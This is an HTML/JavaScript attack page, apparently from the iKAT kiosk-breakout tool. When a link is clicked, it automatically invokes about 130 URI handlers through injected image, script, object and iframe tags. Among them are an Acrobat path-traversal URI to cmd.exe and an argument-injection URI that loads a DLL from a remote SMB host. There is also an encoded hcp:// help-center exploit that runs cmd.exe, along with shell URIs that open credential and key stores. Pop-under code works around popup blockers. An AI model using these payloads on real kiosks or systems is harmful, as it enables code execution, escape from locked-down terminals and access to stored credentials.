<html> 
<head>



<script type="text/javascript">

function urienum() {
//isblocked()
var i;
i = 0;
setInterval(function() {
var x = new Array();
x[0] = 'acrobat://aaa';
x[1] = 'search-ms://';
x[2] = 'feed://aaa';
x[3] = 'acrobat://test/#://../../c:/windows/system32/cmd.exe';
x[4] = 'iim://"%20-vm%20\\120.138.22.77\ikat\ikat.dll%20-url%20';
x[5] = 'ftp://ftp.cdrom.com';
x[6] = 'groove://aaa';
x[7] = 'grvopen://aaa';
x[8] = 'ie.ftp://ftp.cdrom.com';
x[9] = 'ie.http://ikat.ha.cked.net';
x[10] = 'ie.https://ikat.ha.cked.net';
x[11] = 'iehistory://aaaaaaaaaaaa';
x[12] = 'ierss://aaaa';
x[13] = 'ldap://aaa';
x[14] = 'magnet://aaa';
x[15] = 'mailto:paul@ha.cked.net';
x[16] = 'mapi:aaaaaa';
x[17] = 'ms-xhelp:///?install=1&product=a&version=1&locale=en-us&brandingPackage=';
x[18] = 'oms:aaaa';
x[19] = 'onenote:aaa';
x[20] = 'outlook.url:aaa';
x[21] = 'outlook.shell:aaa';
x[22] = 'outlook.url.mailto:paul@ha.cked.net';
x[23] = 'outlookfeed:aaaa';
x[24] = 'outlookfeeds:aaa';
x[25] = 'rlogin:aaa';
x[26] = 'search:aaa';
x[27] = 'search-ms:aaaa';
x[28] = 'SharePointWorkspaceSearch:aaaa';
x[29] = 'StickyNotes:aaa';
x[30] = 'stssync:aaa';
x[31] = 'skype:aaaaa';
x[32] = 'telnet:aaaa';
x[33] = 'tn3270:aaaa';
x[34] = 'hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%28%27Run%2528%2522cmd.exe%2522%2529%27%29%29%3C/script%3E';
x[35]='shell:AddNewProgramsFolder';
x[36]='shell:Administrative Tools';
x[37]='shell:AppData';
x[38]='shell:AppUpdatesFolder';
x[39]='shell:CD Burning';
x[40]='shell:CSCFolder';
x[41]='shell:Cache';
x[42]='shell:ChangeRemoveProgramsFolder';
x[43]='shell:Common Administrative Tools';
x[44]='shell:Common AppData';
x[45]='shell:Common Desktop';
x[46]='shell:Common Documents';
x[47]='shell:Common Favorites';
x[48]='shell:Common Menu';
x[49]='shell:Common Programs';
x[50]='shell:Common Start Menu';
x[51]='shell:Common Startup';
x[52]='shell:Common Templates';
x[53]='shell:CommonDownloads';
x[54]='shell:CommonMusic';
x[55]='shell:CommonPictures';
x[56]='shell:CommonProgramFiles';
x[57]='shell:CommonVideo';
x[58]='shell:ConflictFolder';
x[59]='shell:ConnectionsFolder';
x[60]='shell:Contacts';
x[61]='shell:ControlPanelFolder';
x[62]='shell:Cookies';
x[63]='shell:CredentialManager';
x[64]='shell:CryptoKeys';
x[65]='shell:Default Gadgets';
x[66]='shell:Desktop';
x[67]='shell:DesktopFolder';
x[68]='shell:Downloads';
x[69]='shell:DpapiKeys';
x[70]='shell:DriveFolder';
x[71]='shell:Favorites';
x[72]='shell:Fonts';
x[73]='shell:Gadgets';
x[74]='shell:GameTasks';
x[75]='shell:Games';
x[76]='shell:History';
x[77]='shell:InternetFolder';
x[78]='shell:Links';
x[79]='shell:Local AppData';
x[80]='shell:LocalAppDataLow';
x[81]='shell:LocalizedResourcesDir';
x[82]='shell:MAPIFolder';
x[82]='shell:Menu';
x[83]='shell:My Music';
x[84]='shell:My Pictures';
x[85]='shell:My Video';
x[86]='shell:MyComputerFolder';
x[87]='shell:NetHood';
x[88]='shell:NetworkFolder';
x[89]='shell:NetworkPlacesFolder';
x[90]='shell:OEM Links';
x[91]='shell:Original Images';
x[92]='shell:Personal';
x[93]='shell:PhotoAlbums';
x[94]='shell:Playlists';
x[95]='shell:PrintHood';
x[96]='shell:PrintersFolder';
x[97]='shell:Profile';
x[98]='shell:ProgramFiles';
x[99]='shell:ProgramFilesCommon';
x[100]='shell:ProgramFilesCommonX86';
x[101]='shell:ProgramFilesX86';
x[102]='shell:Programs';
x[103]='shell:Public';
x[104]='shell:PublicGameTasks';
x[105]='shell:Quick Launch';
x[106]='shell:Recent';
x[107]='shell:RecycleBinFolder';
x[108]='shell:ResourceDir';
x[109]='shell:SampleMusic';
x[110]='shell:SamplePictures';
x[111]='shell:SamplePlaylists';
x[112]='shell:SampleVideos';
x[113]='shell:SavedGames';
x[114]='shell:SearchHomeFolder';
x[115]='shell:Searches';
x[116]='shell:SendTo';
x[117]='shell:Start Menu';
x[118]='shell:Startup';
x[119]='shell:SyncCenterFolder';
x[120]='shell:SyncResultsFolder';
x[121]='shell:SyncSetupFolder';
x[122]='shell:System';
x[123]='shell:SystemCertificates';
x[124]='shell:SystemX86';
x[125]='shell:Templates';
x[126]='shell:TreePropertiesFolder';
x[127]='shell:UserProfiles';
x[128]='shell:UsersFilesFolder';
x[129]='shell:Windows';


i++;

if(i >129) {
overlib('Finished!');
return;
}

overlib('<link rel=stylesheet type=text/css media=screen href=../css/style.css/><span><li><font color=red> Invoking ' + x[i] + "</font><br><br> using multiple HTML tag elements and as a Pop-Under Window through Window.Open (You may need to disable any popup blockers!).<br><br><br>" + '<img src=' + x[i] + '>'+ '<div src=' + x[i] + '>' + '<script src=' + x[i] + '>' + '<object codebase=' + x[i] + '>'+ '<iframe src=' + x[i] + '></iframe>.');

},900);

}


function isblocked() {
var mine = window.open('','','width=1,height=1,left=0,top=0,scrollbars=no');
 if(!mine) {
    //var popUpsBlocked = false
 alert("A popup blocker was detected, you will likly need to either disable it, or find a way of allowing the popup.");
 mine.close()
}
    
	
}

function LoadStandardPop(PopURL)
{

var LayerURL=PopURL;
var CookieName='phub';


    if(window.SymRealWinOpen){open=SymRealWinOpen;}
    if(window.NS_ActualOpen){open=NS_ActualOpen;}
          
    var pxLeft = 0;
    var pxTop = 0;
           
    if (screen.width > 0 && screen.height > 0)
    {
        pxLeft = (screen.width / 2) - (20 / 2);
        pxTop = (screen.height / 2) - (20 / 2) - 50;

        if (pxLeft < 0) pxLeft = 0;
        if (pxTop < 0) pxTop = 0;
    }
    

    pLoaded=open(PopURL,'9388101982','toolbar=1,scrollbars=1,location=1,statusbar=1,menubar=1,resizable=1,top=' + pxTop + ',left=' + pxLeft + 'width=20,height=20');

    if (pLoaded)
    {
        // Make the popup show either in front or behind the page
        if (PopFocus == 0)
        {
            pLoaded.blur();
            window.focus();
        }
        
        // We don't want to pop again on the same pop load.
}
}


</script>

</head>

<link rel="stylesheet" type="text/css" media="screen" href="/css/style.css" />
<body style="background: white;">
	
<div id="mselect">


<div id="overDiv" style="position:absolute; visibility:hide; z-index:1;">
</div>
<script LANGUAGE="JavaScript" SRC="overlib.js"></script>
<p><strong><a href=javascript:urienum();> Launch Automatic Invocation </a></p></strong>


</body>
</html>
